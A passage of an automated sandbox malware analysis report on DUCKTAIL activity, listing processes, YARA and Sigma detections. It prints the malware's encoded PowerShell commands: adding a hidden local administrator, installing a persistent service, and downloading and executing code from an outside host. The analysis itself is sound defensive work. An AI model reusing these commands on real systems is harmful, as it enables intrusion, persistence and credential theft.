AG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 8704 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA= MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 8036 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 7764 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 4144 cmdline: "cmd.exe" /c sc stop "myRdpService" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 8012 cmdline: sc stop "myRdpService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 6176 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 7156 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 1424 cmdline: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 3240 cmdline: sc delete "myRdpService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 2308 cmdline: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

net.exe (PID: 3920 cmdline: net start "myRdpService" MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

net1.exe (PID: 2280 cmdline: C:\Windows\system32\net1 start "myRdpService" MD5: BA0BCCC6029FBBE6D8B41197F252742F)

powershell.exe (PID: 8120 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA== MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

myRdpService.exe (PID: 3512 cmdline: C:\Windows\Temp\myRdpService.exe cakoi10 MD5: 5641F3A5B9787F23D3D34F0D9F791B7A)

regedit.exe (PID: 7728 cmdline: "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService" MD5: 999A30979F6195BF562068639FFC4426)

powershell.exe (PID: 6248 cmdline: "powershell.exe" -Command "systeminfo | Select-String \"OS Name\",\"OS Version\";" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

systeminfo.exe (PID: 4244 cmdline: "C:\Windows\system32\systeminfo.exe" MD5: EE309A9C61511E907D87B10EF226FDCD)

WmiPrvSE.exe (PID: 8456 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 8244 cmdline: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 8520 cmdline: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= MD5: 04029E121A0CFA5991749937DD22A1D9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DUCKTAIL	According to Tony Lambert, this is a malware written in .NET. It was observed to be delivered using the .NET Single File deployment feature.	No Attribution	https://forensicitguy.github.io/analyzing-net-core-single-file-ducktail/ https://harfanglab.io/en/insidethelab/reverse-engineering-ida-pro-aot-net/ https://labs.withsecure.com/assets/BlogFiles/Publications/WithSecure_Research_DUCKTAIL.pdf https://labs.withsecure.com/content/dam/labs/docs/WithSecure_Research_DUCKTAIL.pdf https://securelist.com/ducktail-fashion-week/111017/	https://malpedia.caad.fkie.fraunhofer.de/details/win.ducktail

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.3639823852.000001EE99A60000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Ducktail_11	Yara detected Ducktail	Joe Security
Process Memory Space: powershell.exe PID: 4780	JoeSecurity_Ducktail_12	Yara detected Ducktail	Joe Security
Process Memory Space: powershell.exe PID: 4780	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1d01dd:$b1: ::WriteAllBytes( 0x20b04b:$b1: ::WriteAllBytes( 0x60f68:$b2: ::FromBase64String( 0x639e9:$b2: ::FromBase64String( 0x663e5:$b2: ::FromBase64String( 0xea856:$b2: ::FromBase64String( 0xeb052:$b2: ::FromBase64String( 0xeb1cb:$b2: ::FromBase64String( 0xeb3da:$b2: ::FromBase64String( 0xeb4f7:$b2: ::FromBase64String( 0xeb567:$b2: ::FromBase64String( 0xeb5c7:$b2: ::FromBase64String( 0xeb631:$b2: ::FromBase64String( 0xeb68f:$b2: ::FromBase64String( 0xeb714:$b2: ::FromBase64String( 0xeb78f:$b2: ::FromBase64String( 0xeb802:$b2: ::FromBase64String( 0xeb85e:$b2: ::FromBase64String( 0xeb8c5:$b2: ::FromBase64String( 0xeb922:$b2: ::FromBase64String( 0xeb99b:$b2: ::FromBase64String(
Process Memory Space: powershell.exe PID: 8900	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 8900	JoeSecurity_Ducktail_12	Yara detected Ducktail	Joe Security
Process Memory Space: powershell.exe PID: 8900	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x99205:$b1: ::WriteAllBytes( 0x8864a:$b2: ::FromBase64String( 0x8a5c8:$b2: ::FromBase64String( 0x8b538:$b2: ::FromBase64String( 0x8b5ae:$b2: ::FromBase64String( 0x9104c:$b2: ::FromBase64String( 0x127a00:$b3: ::UTF8.GetString( 0x42687:$s1: -join 0x6fa1e:$s1: -join 0x703f2:$s1: -join 0x1858b3:$s1: -join 0x192988:$s1: -join 0x195d5a:$s1: -join 0x19640c:$s1: -join 0x197efd:$s1: -join 0x19a103:$s1: -join 0x19a92a:$s1: -join 0x19b19a:$s1: -join 0x19b8d5:$s1: -join 0x19b907:$s1: -join 0x19b94f:$s1: -join
Process Memory Space: myRdpService.exe PID: 3512	hacktool_windows_moyix_creddump	creddump is a python tool to extract credentials and secrets from Windows registry hives.	@mimeframe	0x791b6:$a1: !@#$%^&()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(@&% 0x7a912:$a2: 0123456789012345678901234567890123456789 0x872d6:$a3: NTPASSWORD 0x8600d:$a4: LMPASSWORD 0x98b01:$a5: aad3b435b51404eeaad3b435b51404ee 0x7b80a:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
Click to see the 2 entries

Other

Source	Rule	Description	Author	Strings
amsi64_8900.amsi.csv	JoeSecurity_Ducktail_12	Yara detected Ducktail	Joe Security
amsi64_8900.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xfd2d:$b1: ::WriteAllBytes( 0xc19f:$b2: ::FromBase64String( 0xe11e:$b2: ::FromBase64String( 0xf08f:$b2: ::FromBase64String( 0x529:$b3: ::UTF8.GetString( 0xbdf0:$s1: -join 0x239:$s4: += 0x25c:$s4: += 0x559c:$s4: += 0x565e:$s4: += 0x9885:$s4: += 0xb9a2:$s4: += 0xbc8c:$s4: += 0xbdd2:$s4: += 0xf247:$s4: += 0xf444:$s4: += 0x116fa:$s4: += 0x69adb:$s4: += 0x69b5b:$s4: += 0x69c21:$s4: += 0x69ca1:$s4: +=

Sigma Signatures

System Summary

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAVAAuAEUATgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAHQAUwBUAHIASQBOAEcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBhAFoAQQA9AD0AIgApACkAKQApAC4AQwBPAE4AdABFAE4AdAApACkA , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAVAAuAEUATgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAHQAUwBUAHIASQBOAEcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBhAFoAQQA9AD0AIgApACkAKQApAC4AQwBPAE4AdABFAE4AdAApACkA , CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAGgAQQBGAG8AQQBRAFEAQQA5AEEARAAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQ

Sigma detected: PowerShell Base64 Encoded IEX Cmdlet

Source: Process started

Sigma detected: PowerShell Base64 Encoded Invoke Keyword

Source: Process started

Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA4AGEAOAA0AGMAMwA2ADAAOQAzADIAMwBkAGUANgBjAGQAOQBjADIANQBhADEAOAA1ADEAZAAwAGQAYwBkADgAYQAyAGYAMwBiADAAOQA3ADcANgBiAGYAOABlADcAZAA0AGQANgA0ADAAMgBhADYANwAyADAAYwAxAGEAZABkADgAOQBhADIAMwBkADUAZQBkADEAMgBlADAANQBjAGYAMgBmADUAMwBkADcAYgAwADEANQBlADcANgBiAGQANQBiADgAMgAyADMAOQA5ADgANwBjADAANAA5AGQAZQBmAGIAOQBiAGUANwA3ADcANQBmADAAYgA1ADAAZQAxADMAMABkADgAZABiAGUAZABlADQANQA4ADgAYQAwADYAZQAwAGIAYgAwADUANgA4AGIAYwA5AGQAYwA1AGEAOQA1ADkAMAA1ADgAZAAxAGIAOQA4ADcAMwAyAGIAYgA4AGQAYQA0AGMAMAA3AGQAYgBiADUANgA3AGYAOQAzAGYAMwA3ADAANgBkAGQANgAyAGYAZAAyADEAZgA1AGUAYQBlADEANwAyAGQANQAwADIANgBjAGQAZAA1ADIANwA5AGYAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABiAHkAdABlAEEAcgByAGEAeQA

Sigma detected: PowerShell Base64 Encoded WMI Classes

Source: Process started

Author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABV